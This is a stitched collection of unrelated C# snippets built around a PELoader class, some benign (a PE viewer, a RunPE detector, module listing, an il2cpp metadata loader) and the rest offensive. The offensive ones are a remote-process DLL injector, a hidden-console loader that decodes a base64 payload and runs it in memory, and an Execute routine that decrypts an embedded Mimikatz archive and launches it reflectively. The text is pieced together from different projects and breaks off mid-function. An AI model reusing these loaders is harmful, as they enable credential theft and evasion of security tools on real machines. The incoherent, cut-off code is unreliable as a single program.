public static void LoadDll(int pID, byte[] dllBytes)
{
PEInfomation dllPE = PELoader.Load(dllBytes, string.Empty);
IntPtr pHandle = PELoader.OpenProcessHandle(pID);
if (pHandle == IntPtr.Zero)
{
throw new Exception("Invalid PID");
}
IntPtr vAlloc = NativeMethods.VirtualAllocEx(pHandle, 0, dllPE.Overview.SizeOfImage, 0x1000, 0x40);
if (vAlloc == IntPtr.Zero)
{
throw new Exception("Alloc failed");
}
NativeMethods.WriteProcessMemory(pHandle, vAlloc, dllBytes, dllPE.Overview.SizeOfHeaders, 0);
foreach (var section in dllPE.Sections)
{
byte[] sData = new byte[section.VirtualSize];
Buffer.BlockCopy(dllBytes, (int)section.PointerToRawData, sData, 0, sData.Length);
NativeMethods.WriteProcessMemory(pHandle, new IntPtr(vAlloc.ToInt32() + section.VirtualAddress), sData, (uint)sData.Length, 0);
}
}
/// <summary>
///
/// </summary>
/// <param name="module">Main module of process being analyzed</param>
/// <param name="processPID">Process id of process being analyzed</param>
/// <returns></returns>
private bool HasRunPE(ProcessModule module, int processPID)
{
//Catch if process has been killed already
//try
//{
// Process.GetProcessById(processPID);
//}
//catch
//{
// return false;
//}
string modulePath = module.FileName;
PEInfomation procPE = PELoader.Load(processPID, module);
PEInfomation filePE = PELoader.Load(modulePath);
int unmachedValues = 0;
unmachedValues += ScanType(procPE.FileHeader, filePE.FileHeader); // File Header
unmachedValues += ScanType(procPE.OptionalHeader32, filePE.OptionalHeader32); // Optional Header
int sectionAmmount = Math.Min(Convert.ToInt32(procPE.Overview.NumberOfSections), Convert.ToInt32(filePE.Overview.NumberOfSections));
for (int i = 0; i < sectionAmmount; i++)
{
unmachedValues += ScanType(procPE.Sections[i], filePE.Sections[i]);
}
return(unmachedValues >= 8);
}
public bool Load(string path)
{
if (path.StartsWith("./") || path.StartsWith(".\\"))
{
path = path.Substring(2);
}
if (!loaded.Contains(path))
{
try {
PELoader pe = new PELoader(path);
long time = Debug.Clock;
metaData.Add(MetaData.loadMetaData(path, pe, false, false));
// Debug.Report("inhaling " + path, Debug.Clock - time);
loaded.Add(path);
} catch {
return(false);
}
}
// Add top-level namespaces to global namespace
foreach (MetaData m in metaData)
{
foreach (MetaDataTypeDefinition d in m.TypeDefs)
{
if (d.Namespace != "")
{
GetNameSpace(d.Namespace);
}
}
}
return(true);
}
private void unloadSelectedModulesToolStripMenuItem_Click(object sender, EventArgs e)
{
foreach (ListViewItem i in lvModules.SelectedItems)
{
ModuleListViewItem item = (ModuleListViewItem)i;
IntPtr pHandle = PELoader.OpenProcessHandle(ProcessID);
DllInjector.UnloadDll(pHandle, item.ModuleInfomation.ModuleBaseAddress);
PELoader.CloseProcessHandle(pHandle);
PopulateList();
}
}
private void processToolStripMenuItem1_Click(object sender, EventArgs e)
{
using (formLoadProcess procLoadForm = new formLoadProcess())
{
if (procLoadForm.ShowDialog() == DialogResult.OK)
{
LoadedPE = PELoader.Load(procLoadForm.SelectedProcessID, procLoadForm.SelectedModule);
LoadedPE.PESource = string.Format("Process: {0}", procLoadForm.ProcessName);
lbCurrentSection.Text = "Overview";
PopulateInfo(LoadedPE.Overview, false);
}
}
}
private void button1_Click(object sender, EventArgs e)
{
lbProcessList.Items.Clear();
lvFileList.Items.Clear();
ProcessModule moduleToScan = null;
int pid = 0;
using (formLoadProcess procLoadForm = new formLoadProcess())
{
if (procLoadForm.ShowDialog() != DialogResult.OK)
{
return;
}
this.Text = string.Format("{0} ({1})", WindowText, procLoadForm.ProcessName);
moduleToScan = procLoadForm.SelectedModule;
pid = procLoadForm.SelectedProcessID;
}
string modulePath = moduleToScan.FileName;
PEInfomation procPE = PELoader.Load(pid, moduleToScan);
PEInfomation filePE = PELoader.Load(modulePath);
int unmachedValues = 0;
unmachedValues += ScanType <IMAGE_FILE_HEADER>(procPE.FileHeader, filePE.FileHeader, "File Header");
unmachedValues += ScanType <IMAGE_OPTIONAL_HEADER32>(procPE.OptionalHeader32, filePE.OptionalHeader32, "Optional Header", "ImageBase");
int sectionAmmount = Math.Min(Convert.ToInt32(procPE.Overview.NumberOfSections), Convert.ToInt32(filePE.Overview.NumberOfSections));
for (int i = 0; i < sectionAmmount; i++)
{
unmachedValues += ScanType <IMAGE_SECTION_HEADER>(procPE.Sections[i], filePE.Sections[i], string.Format("Section {0}", i + 1));
}
Color tColor = Color.Green;
string warningText = "No RunPE Found (0 Unmached values)";
if (unmachedValues >= 1)
{
tColor = Color.DarkTurquoise;
warningText = string.Format("Possable RunPe ({0} Unmaching values)", unmachedValues);
}
if (unmachedValues > 4)
{
tColor = Color.Red;
warningText = string.Format("RunPe Found ({0} Unmaching values)", unmachedValues);
}
lbRunpeStatus.Text = warningText;
lbRunpeStatus.ForeColor = tColor;
}
private void fileToolStripMenuItem1_Click(object sender, EventArgs e)
{
using (OpenFileDialog ofd = new OpenFileDialog())
{
ofd.Filter = "Executable|*.exe|Library|*.dll";
if (ofd.ShowDialog() == DialogResult.OK)
{
LoadedPE = PELoader.Load(ofd.FileName);
LoadedPE.PESource = ofd.FileName;
lbCurrentSection.Text = "Overview";
PopulateInfo(LoadedPE.Overview, false);
}
}
}
private static unsafe IntPtr GetFuncExport(PELoader pe, string funcName)
{
IntPtr ExportTablePtr = IntPtr.Zero;
PELoader.IMAGE_EXPORT_DIRECTORY expDir;
if (pe.Is32BitHeader && pe.OptionalHeader32.ExportTable.Size == 0)
{
return(IntPtr.Zero);
}
else if (!pe.Is32BitHeader && pe.OptionalHeader64.ExportTable.Size == 0)
{
return(IntPtr.Zero);
}
if (pe.Is32BitHeader)
{
ExportTablePtr = (IntPtr)((ulong)codebase + (ulong)pe.OptionalHeader32.ExportTable.VirtualAddress);
}
else
{
ExportTablePtr = (IntPtr)((ulong)codebase + (ulong)pe.OptionalHeader64.ExportTable.VirtualAddress);
}
expDir = (PELoader.IMAGE_EXPORT_DIRECTORY)Marshal.PtrToStructure(ExportTablePtr, typeof(PELoader.IMAGE_EXPORT_DIRECTORY));
for (int i = 0; i < expDir.NumberOfNames; i++)
{
IntPtr NameOffsetPtr = (IntPtr)((ulong)codebase + (ulong)expDir.AddressOfNames);
NameOffsetPtr = (IntPtr)((ulong)NameOffsetPtr + (ulong)(i * Marshal.SizeOf(typeof(uint))));
IntPtr NamePtr = (IntPtr)((ulong)codebase + (uint)Marshal.PtrToStructure(NameOffsetPtr, typeof(uint)));
string Name = Marshal.PtrToStringAnsi(NamePtr);
if (Name.Contains(funcName))
{
IntPtr AddressOfFunctions = (IntPtr)((ulong)codebase + (ulong)expDir.AddressOfFunctions);
IntPtr OrdinalRvaPtr = (IntPtr)((ulong)codebase + (ulong)(expDir.AddressOfOrdinals + (i * Marshal.SizeOf(typeof(UInt16)))));
UInt16 FuncIndex = (UInt16)Marshal.PtrToStructure(OrdinalRvaPtr, typeof(UInt16));
IntPtr FuncOffsetLocation = (IntPtr)((ulong)AddressOfFunctions + (ulong)(FuncIndex * Marshal.SizeOf(typeof(UInt32))));
IntPtr FuncLocationInMemory = (IntPtr)((ulong)codebase + (uint)Marshal.PtrToStructure(FuncOffsetLocation, typeof(UInt32)));
return(FuncLocationInMemory);
}
}
return(IntPtr.Zero);
}
private void findUnlistedImageSectorsToolStripMenuItem_Click(object sender, EventArgs e)
{
MEMORY_BASIC_INFORMATION memInfo = new MEMORY_BASIC_INFORMATION();
int mem_size = Marshal.SizeOf(memInfo);
uint currentAddress = 0;
IntPtr hProc = PELoader.OpenProcessHandle(ProcessID);
while (NativeMethods.VirtualQueryEx(hProc, currentAddress, out memInfo, mem_size) != 0)
{
if (FoundModules.Contains(memInfo.AllocationBase))
{
currentAddress += memInfo.RegionSize;
continue;
}
if (memInfo.Protect == 0x1)//memInfo.Type != 0x1000000
{
currentAddress += memInfo.RegionSize;
continue;
}
IMAGE_DOS_HEADER header = PELoader.StructFromMemory <IMAGE_DOS_HEADER>(hProc, memInfo.AllocationBase);
if (!FoundModules.Contains(memInfo.BaseAddress))
{
byte[] buffer = new byte[memInfo.RegionSize];
NativeMethods.ReadProcessMemory(hProc, memInfo.BaseAddress, buffer, buffer.Length, 0);
for (int i = 0; i < buffer.Length - 1; i++)
{
if (buffer[i] == 'M' && buffer[i + 1] == 'Z')
{
lvModules.Items.Add(new ModuleListViewItem(ProcessID, memInfo.BaseAddress + i));
}
}
FoundModules.Add(memInfo.BaseAddress);
}
/*
* if(header.e_magic[0] == 'M' && header.e_magic[1] == 'Z')
* lvModules.Items.Add(new ModuleListViewItem(ProcessID, memInfo.AllocationBase));
* FoundModules.Add(memInfo.AllocationBase);
*/
currentAddress += memInfo.RegionSize;//0x1000000
}
PELoader.CloseProcessHandle(hProc);
}
void PopulateList()
{
IntPtr pHandle = PELoader.OpenProcessHandle(ProcessID);
if (pHandle == IntPtr.Zero)
{
MessageBox.Show("Failed to load process");
this.DialogResult = DialogResult.OK;
return;
}
int size = 0;
if (!NativeMethods.EnumProcessModulesEx(pHandle, null, 0, out size, 0x01))
{
MessageBox.Show("Failed to get module count");
this.DialogResult = DialogResult.OK;
return;
}
lvModules.Items.Clear();
FoundModules.Clear();
int ModuleCount = size / Marshal.SizeOf(typeof(IntPtr));
IntPtr[] modules = new IntPtr[ModuleCount];
if (!NativeMethods.EnumProcessModulesEx(pHandle, modules, size, out size, 0x01))
{
MessageBox.Show("Failed to get modules");
this.DialogResult = DialogResult.OK;
return;
}
FoundModules.AddRange(modules);
foreach (IntPtr m in modules)
{
lvModules.Items.Add(new ModuleListViewItem(ProcessID, m));
}
PELoader.CloseProcessHandle(pHandle);
}
public ModuleListViewItem(int procID, IntPtr _handle)
{
ModuleInfomation = PELoader.Load(procID, _handle);
Handle = _handle;
ProcessHandle = ModuleInfomation.GetProcessHandle();
StringBuilder sb = new StringBuilder(255);
NativeMethods.GetModuleFileNameEx(ProcessHandle, Handle, sb, 255);
ModulePath = sb.ToString();
Text = Path.GetFileName(ModulePath);
SubItems.Add(string.Format("0x{0:x2}", IntPtr.Size == 4 ? _handle.ToInt32() : _handle.ToInt64()));
SubItems.Add(ModuleInfomation.Overview.SizeOfImage.ToString());
if (!string.IsNullOrEmpty(Text))
{
SubItems.Add(ModulePath);
}
else
{
SubItems.Add("Byte loaded");
}
}
private bool ExtractCurrentData(string il2cppPath, string metadataPath, out Il2Cpp il2Cpp, out Il2CppExecutor executor, out Metadata metadata)
{
il2Cpp = null;
executor = null;
metadata = null;
var metadataBytes = File.ReadAllBytes(metadataPath);
metadata = new Metadata(new MemoryStream(metadataBytes));
var il2cppBytes = File.ReadAllBytes(il2cppPath);
var il2cppMagic = BitConverter.ToUInt32(il2cppBytes, 0);
var il2CppMemory = new MemoryStream(il2cppBytes);
if (il2cppMagic != IL2CPPMAGIC_PE)
{
throw new Exception("Unexpected il2cpp magic number.");
}
il2Cpp = new PE(il2CppMemory);
il2Cpp.SetProperties(metadata.Version, metadata.maxMetadataUsages);
if (il2Cpp.Version >= 27 && il2Cpp is ElfBase elf && elf.IsDumped)
{
metadata.Address = Convert.ToUInt64(Console.ReadLine(), 16);
}
try
{
var flag = il2Cpp.PlusSearch(metadata.methodDefs.Count(x => x.methodIndex >= 0), metadata.typeDefs.Length, metadata.imageDefs.Length);
if (RuntimeInformation.IsOSPlatform(OSPlatform.Windows))
{
if (!flag && il2Cpp is PE)
{
il2Cpp = PELoader.Load(il2cppPath);
il2Cpp.SetProperties(metadata.Version, metadata.maxMetadataUsages);
flag = il2Cpp.PlusSearch(metadata.methodDefs.Count(x => x.methodIndex >= 0), metadata.typeDefs.Length, metadata.imageDefs.Length);
}
}
if (!flag)
{
flag = il2Cpp.Search();
}
if (!flag)
{
flag = il2Cpp.SymbolSearch();
}
if (!flag)
{
var codeRegistration = Convert.ToUInt64(Console.ReadLine(), 16);
var metadataRegistration = Convert.ToUInt64(Console.ReadLine(), 16);
il2Cpp.Init(codeRegistration, metadataRegistration);
}
}
catch
{
throw new Exception("ERROR: An error occurred while processing.");
}
executor = new Il2CppExecutor(metadata, il2Cpp);
return(true);
}
public static void Main()
{
// hide window
var windowHandle = GetConsoleWindow();
ShowWindow(windowHandle, SW_HIDE);
// base64 encoded payload back to bytes
byte[] bytes = System.Convert.FromBase64String(payloadBASE64);
// decompress / unzip payload bytes
using (var msi = new MemoryStream(bytes)) {
using (var mso = new MemoryStream()) {
using (var gs = new GZipStream(msi, CompressionMode.Decompress)) {
int cnt;
byte[] tmpBytes = new Byte[512];
while ((cnt = gs.Read(tmpBytes, 0, tmpBytes.Length)) != 0)
{
mso.Write(tmpBytes, 0, cnt);
}
}
bytes = mso.ToArray();
}
}
// PE injection
PELoader pe = new PELoader(bytes);
//Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader64.ImageBase.ToString("X4"));
IntPtr codebase = IntPtr.Zero;
codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader64.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
//Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader64.SizeOfImage.ToString("X4"), codebase.ToString("X4"));
// Copy Sections
for (int i = 0; i < pe.FileHeader.NumberOfSections; i++)
{
IntPtr y = NativeDeclarations.VirtualAlloc(IntPtr.Add(codebase, (int)pe.ImageSectionHeaders[i].VirtualAddress), pe.ImageSectionHeaders[i].SizeOfRawData, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
Marshal.Copy(pe.RawBytes, (int)pe.ImageSectionHeaders[i].PointerToRawData, y, (int)pe.ImageSectionHeaders[i].SizeOfRawData);
//Console.WriteLine("Section {0}, Copied To {1}", new string(pe.ImageSectionHeaders[i].Name), y.ToString("X4"));
}
// Perform Base Relocation
// Calculate Delta
long currentbase = (long)codebase.ToInt64();
long delta;
delta = (long)(currentbase - (long)pe.OptionalHeader64.ImageBase);
//Console.WriteLine("Delta = {0}", delta.ToString("X4"));
//Console.WriteLine(pe.OptionalHeader64.BaseRelocationTable.VirtualAddress.ToString("X4"));
//Console.WriteLine(pe.OptionalHeader64.BaseRelocationTable.Size.ToString("X4"));
// Modify Memory Based On Relocation Table
IntPtr relocationTable = (IntPtr.Add(codebase, (int)pe.OptionalHeader64.BaseRelocationTable.VirtualAddress));
//Console.WriteLine(relocationTable.ToString("X4"));
NativeDeclarations.IMAGE_BASE_RELOCATION relocationEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION();
relocationEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(relocationTable, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
//Console.WriteLine(relocationEntry.VirtualAdress.ToString("X4"));
//Console.WriteLine(relocationEntry.SizeOfBlock.ToString("X4"));
int imageSizeOfBaseRelocation = Marshal.SizeOf(typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
IntPtr nextEntry = relocationTable;
int sizeofNextBlock = (int)relocationEntry.SizeOfBlock;
IntPtr offset = relocationTable;
while (true)
{
NativeDeclarations.IMAGE_BASE_RELOCATION relocationNextEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION();
IntPtr x = IntPtr.Add(relocationTable, sizeofNextBlock);
relocationNextEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(x, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
IntPtr dest = IntPtr.Add(codebase, (int)relocationEntry.VirtualAdress);
//Console.WriteLine("Section Has {0} Entires",(int)(relocationEntry.SizeOfBlock - imageSizeOfBaseRelocation) /2);
//Console.WriteLine("Next Section Has {0} Entires", (int)(relocationNextEntry.SizeOfBlock - imageSizeOfBaseRelocation) / 2);
for (int i = 0; i < (int)((relocationEntry.SizeOfBlock - imageSizeOfBaseRelocation) / 2); i++)
{
IntPtr patchAddr;
UInt16 value = (UInt16)Marshal.ReadInt16(offset, 8 + (2 * i));
UInt16 type = (UInt16)(value >> 12);
UInt16 fixup = (UInt16)(value & 0xfff);
//Console.WriteLine("{0}, {1}, {2}", value.ToString("X4"), type.ToString("X4"), fixup.ToString("X4"));
switch (type)
{
case 0x0:
break;
case 0xA:
patchAddr = IntPtr.Add(dest, fixup);
//Add Delta To Location.
long originalAddr = Marshal.ReadInt64(patchAddr);
Marshal.WriteInt64(patchAddr, originalAddr + delta);
break;
}
}
offset = IntPtr.Add(relocationTable, sizeofNextBlock);
sizeofNextBlock += (int)relocationNextEntry.SizeOfBlock;
relocationEntry = relocationNextEntry;
nextEntry = IntPtr.Add(nextEntry, sizeofNextBlock);
if (relocationNextEntry.SizeOfBlock == 0)
{
break;
}
}
// Resolve Imports
IntPtr z = IntPtr.Add(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress);
IntPtr oa1 = IntPtr.Add(codebase, (int)pe.OptionalHeader64.ImportTable.VirtualAddress);
int oa2 = Marshal.ReadInt32(IntPtr.Add(oa1, 16));
// Get And Display Each DLL To Load
for (int j = 0; j < 999; j++) // HardCoded Number of DLL's Do this Dynamically.
{
IntPtr a1 = IntPtr.Add(codebase, (20 * j) + (int)pe.OptionalHeader64.ImportTable.VirtualAddress);
int entryLength = Marshal.ReadInt32(IntPtr.Add(a1, 16));
IntPtr a2 = IntPtr.Add(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2)); //Need just last part?
IntPtr dllNamePTR = (IntPtr)(IntPtr.Add(codebase, +Marshal.ReadInt32(IntPtr.Add(a1, 12))));
string DllName = Marshal.PtrToStringAnsi(dllNamePTR);
if (DllName == "")
{
break;
}
IntPtr handle = NativeDeclarations.LoadLibrary(DllName);
//Console.WriteLine("Loaded {0}", DllName);
for (int k = 1; k < 9999; k++)
{
IntPtr dllFuncNamePTR = (IntPtr.Add(codebase, +Marshal.ReadInt32(a2)));
string DllFuncName = Marshal.PtrToStringAnsi(IntPtr.Add(dllFuncNamePTR, 2));
//Console.WriteLine("Function {0}", DllFuncName);
IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName);
Marshal.WriteInt64(a2, (long)funcAddy);
a2 = IntPtr.Add(a2, 8);
if (DllFuncName == "")
{
break;
}
}
}
//Transfer Control To OEP
//Console.WriteLine("Executing loaded PE");
IntPtr threadStart = IntPtr.Add(codebase, (int)pe.OptionalHeader64.AddressOfEntryPoint);
IntPtr hThread = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero);
NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF);
//Console.WriteLine("Thread Complete");
//Console.ReadLine();
}
public override bool Execute()
{
byte[] unpacked = null;
try
{
byte[] latestMimikatz = Misc.Decrypt(Convert.FromBase64String(this.MyProperty), "password"); //Yes, this is a bad idea.
//Use Misc Class to encrypt your own files
Stream data = new MemoryStream(latestMimikatz); //The original data
Stream unzippedEntryStream; //Unzipped data from a file in the archive
ZipArchive archive = new ZipArchive(data);
foreach (ZipArchiveEntry entry in archive.Entries)
{
if (IntPtr.Size == 8 && entry.FullName == @"x64/mimikatz.exe") //x64 Unpack And Execute
{
//x64 Unpack And Execute
Console.WriteLine(entry.FullName);
unzippedEntryStream = entry.Open(); // .Open will return a stream
unpacked = Misc.ReadFully(unzippedEntryStream);
}
else if (IntPtr.Size == 4 && entry.FullName == @"Win32/mimikatz.exe")
{
//x86 Unpack And Execute
Console.WriteLine(entry.FullName);
unzippedEntryStream = entry.Open(); // .Open will return a stream
unpacked = Misc.ReadFully(unzippedEntryStream);
}
}
}
catch (Exception ex)
{
while (ex != null)
{
Console.WriteLine(ex.Message);
ex = ex.InnerException;
}
}
Console.WriteLine("Downloaded Latest");
PELoader pe = new PELoader(unpacked);
IntPtr codebase = IntPtr.Zero;
if (pe.Is32BitHeader)
{
Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader32.ImageBase.ToString("X4"));
codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader32.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader32.SizeOfImage.ToString("X4"), codebase.ToString("X4"));
}
else
{
Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader64.ImageBase.ToString("X4"));
codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader64.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader64.SizeOfImage.ToString("X4"), codebase.ToString("X4"));
}
//Copy Sections
for (int i = 0; i < pe.FileHeader.NumberOfSections; i++)
{
IntPtr y = NativeDeclarations.VirtualAlloc(IntPtr.Add(codebase, (int)pe.ImageSectionHeaders[i].VirtualAddress), pe.ImageSectionHeaders[i].SizeOfRawData, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
Marshal.Copy(pe.RawBytes, (int)pe.ImageSectionHeaders[i].PointerToRawData, y, (int)pe.ImageSectionHeaders[i].SizeOfRawData);
Console.WriteLine("Section {0}, Copied To {1}", new string(pe.ImageSectionHeaders[i].Name), y.ToString("X4"));
}
//Perform Base Relocation
//Calculate Delta
IntPtr currentbase = codebase;
long delta;
if (pe.Is32BitHeader)
{
delta = (int)(currentbase.ToInt32() - (int)pe.OptionalHeader32.ImageBase);
}
else
{
delta = (long)(currentbase.ToInt64() - (long)pe.OptionalHeader64.ImageBase);
}
Console.WriteLine("Delta = {0}", delta.ToString("X4"));
//Modify Memory Based On Relocation Table
IntPtr relocationTable;
if (pe.Is32BitHeader)
{
relocationTable = (IntPtr.Add(codebase, (int)pe.OptionalHeader32.BaseRelocationTable.VirtualAddress));
}
else
{
relocationTable = (IntPtr.Add(codebase, (int)pe.OptionalHeader64.BaseRelocationTable.VirtualAddress));
}
NativeDeclarations.IMAGE_BASE_RELOCATION relocationEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION();
relocationEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(relocationTable, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
int imageSizeOfBaseRelocation = Marshal.SizeOf(typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
IntPtr nextEntry = relocationTable;
int sizeofNextBlock = (int)relocationEntry.SizeOfBlock;
IntPtr offset = relocationTable;
while (true)
{
NativeDeclarations.IMAGE_BASE_RELOCATION relocationNextEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION();
IntPtr x = IntPtr.Add(relocationTable, sizeofNextBlock);
relocationNextEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(x, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
IntPtr dest = IntPtr.Add(codebase, (int)relocationEntry.VirtualAdress);
for (int i = 0; i < (int)((relocationEntry.SizeOfBlock - imageSizeOfBaseRelocation) / 2); i++)
{
IntPtr patchAddr;
UInt16 value = (UInt16)Marshal.ReadInt16(offset, 8 + (2 * i));
UInt16 type = (UInt16)(value >> 12);
UInt16 fixup = (UInt16)(value & 0xfff);
switch (type)
{
case 0x0:
break;
case 0x3:
patchAddr = IntPtr.Add(dest, fixup);
//Add Delta To Location.
int originalx86Addr = Marshal.ReadInt32(patchAddr);
Marshal.WriteInt32(patchAddr, originalx86Addr + (int)delta);
break;
case 0xA:
patchAddr = IntPtr.Add(dest, fixup);
//Add Delta To Location.
long originalAddr = Marshal.ReadInt64(patchAddr);
Marshal.WriteInt64(patchAddr, originalAddr + delta);
break;
}
}
offset = IntPtr.Add(relocationTable, sizeofNextBlock);
sizeofNextBlock += (int)relocationNextEntry.SizeOfBlock;
relocationEntry = relocationNextEntry;
nextEntry = IntPtr.Add(nextEntry, sizeofNextBlock);
if (relocationNextEntry.SizeOfBlock == 0)
{
break;
}
}
//Resolve Imports
IntPtr z;
IntPtr oa1;
int oa2;
if (pe.Is32BitHeader)
{
z = IntPtr.Add(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress);
oa1 = IntPtr.Add(codebase, (int)pe.OptionalHeader32.ImportTable.VirtualAddress);
oa2 = Marshal.ReadInt32(IntPtr.Add(oa1, 16));
}
else
{
z = IntPtr.Add(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress);
oa1 = IntPtr.Add(codebase, (int)pe.OptionalHeader64.ImportTable.VirtualAddress);
oa2 = Marshal.ReadInt32(IntPtr.Add(oa1, 16));
}
//Get And Display Each DLL To Load
IntPtr threadStart;
IntPtr hThread;
if (pe.Is32BitHeader)
{
int j = 0;
while (true) //HardCoded Number of DLL's Do this Dynamically.
{
IntPtr a1 = IntPtr.Add(codebase, (20 * j) + (int)pe.OptionalHeader32.ImportTable.VirtualAddress);
int entryLength = Marshal.ReadInt32(IntPtr.Add(a1, 16));
IntPtr a2 = IntPtr.Add(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2));
IntPtr dllNamePTR = (IntPtr)(IntPtr.Add(codebase, Marshal.ReadInt32(IntPtr.Add(a1, 12))));
string DllName = Marshal.PtrToStringAnsi(dllNamePTR);
if (DllName == "")
{
break;
}
IntPtr handle = NativeDeclarations.LoadLibrary(DllName);
Console.WriteLine("Loaded {0}", DllName);
int k = 0;
while (true)
{
IntPtr dllFuncNamePTR = (IntPtr.Add(codebase, Marshal.ReadInt32(a2)));
string DllFuncName = Marshal.PtrToStringAnsi(IntPtr.Add(dllFuncNamePTR, 2));
IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName);
Marshal.WriteInt32(a2, (int)funcAddy);
a2 = IntPtr.Add(a2, 4);
if (DllFuncName == "")
{
break;
}
k++;
}
j++;
}
//Transfer Control To OEP
Console.WriteLine("Executing Mimikatz");
threadStart = IntPtr.Add(codebase, (int)pe.OptionalHeader32.AddressOfEntryPoint);
hThread = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero);
NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF);
Console.WriteLine("Thread Complete");
}
else
{
int j = 0;
while (true)
{
IntPtr a1 = IntPtr.Add(codebase, (20 * j) + (int)pe.OptionalHeader64.ImportTable.VirtualAddress);
int entryLength = Marshal.ReadInt32(IntPtr.Add(a1, 16));
IntPtr a2 = IntPtr.Add(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2)); //Need just last part?
IntPtr dllNamePTR = (IntPtr)(IntPtr.Add(codebase, Marshal.ReadInt32(IntPtr.Add(a1, 12))));
string DllName = Marshal.PtrToStringAnsi(dllNamePTR);
if (DllName == "")
{
break;
}
IntPtr handle = NativeDeclarations.LoadLibrary(DllName);
Console.WriteLine("Loaded {0}", DllName);
int k = 0;
while (true)
{
IntPtr dllFuncNamePTR = (IntPtr.Add(codebase, Marshal.ReadInt32(a2)));
string DllFuncName = Marshal.PtrToStringAnsi(IntPtr.Add(dllFuncNamePTR, 2));
//Console.WriteLine("Function {0}", DllFuncName);
IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName);
Marshal.WriteInt64(a2, (long)funcAddy);
a2 = IntPtr.Add(a2, 8);
if (DllFuncName == "")
{
break;
}
k++;
}
j++;
}
//Transfer Control To OEP
Console.WriteLine("Executing Mimikatz");
threadStart = IntPtr.Add(codebase, (int)pe.OptionalHeader64.AddressOfEntryPoint);
hThread = NativeDeclarations.CreateThread(IntPtr.Zero, 0, threadStart, IntPtr.Zero, 0, IntPtr.Zero);
NativeDeclarations.WaitForSingleObject(hThread, 0xFFFFFFFF);
Console.WriteLine("Thread Complete");
}
//Transfer Control To OEP
Console.WriteLine("Thread Complete");
//Console.ReadLine();
return(true);
} //End Main
public static IntPtr LoadPE(byte[] latestMimikatz)
{
#if DEBUG
Console.WriteLine("Loading PE (Mimikatz)");
#endif
PELoader pe = new PELoader(latestMimikatz);
if (pe.Is32BitHeader)
{
#if DEBUG
Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader32.ImageBase.ToString("X4"));
#endif
codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader32.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
#if DEBUG
Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader32.SizeOfImage.ToString("X4"), codebase.ToString("X4"));
#endif
}
else
{
#if DEBUG
Console.WriteLine("Preferred Load Address = {0}", pe.OptionalHeader64.ImageBase.ToString("X4"));
#endif
codebase = NativeDeclarations.VirtualAlloc(IntPtr.Zero, pe.OptionalHeader64.SizeOfImage, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
#if DEBUG
Console.WriteLine("Allocated Space For {0} at {1}", pe.OptionalHeader64.SizeOfImage.ToString("X4"), codebase.ToString("X4"));
#endif
}
//Copy Sections
for (int i = 0; i < pe.FileHeader.NumberOfSections; i++)
{
IntPtr y = NativeDeclarations.VirtualAlloc(IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[i].VirtualAddress), pe.ImageSectionHeaders[i].SizeOfRawData, NativeDeclarations.MEM_COMMIT, NativeDeclarations.PAGE_EXECUTE_READWRITE);
Marshal.Copy(pe.RawBytes, (int)pe.ImageSectionHeaders[i].PointerToRawData, y, (int)pe.ImageSectionHeaders[i].SizeOfRawData);
#if DEBUG
Console.WriteLine("Section {0}, Copied To {1}", new string(pe.ImageSectionHeaders[i].Name), y.ToString("X4"));
#endif
}
//Perform Base Relocation
//Calculate Delta
IntPtr currentbase = codebase;
long delta;
if (pe.Is32BitHeader)
{
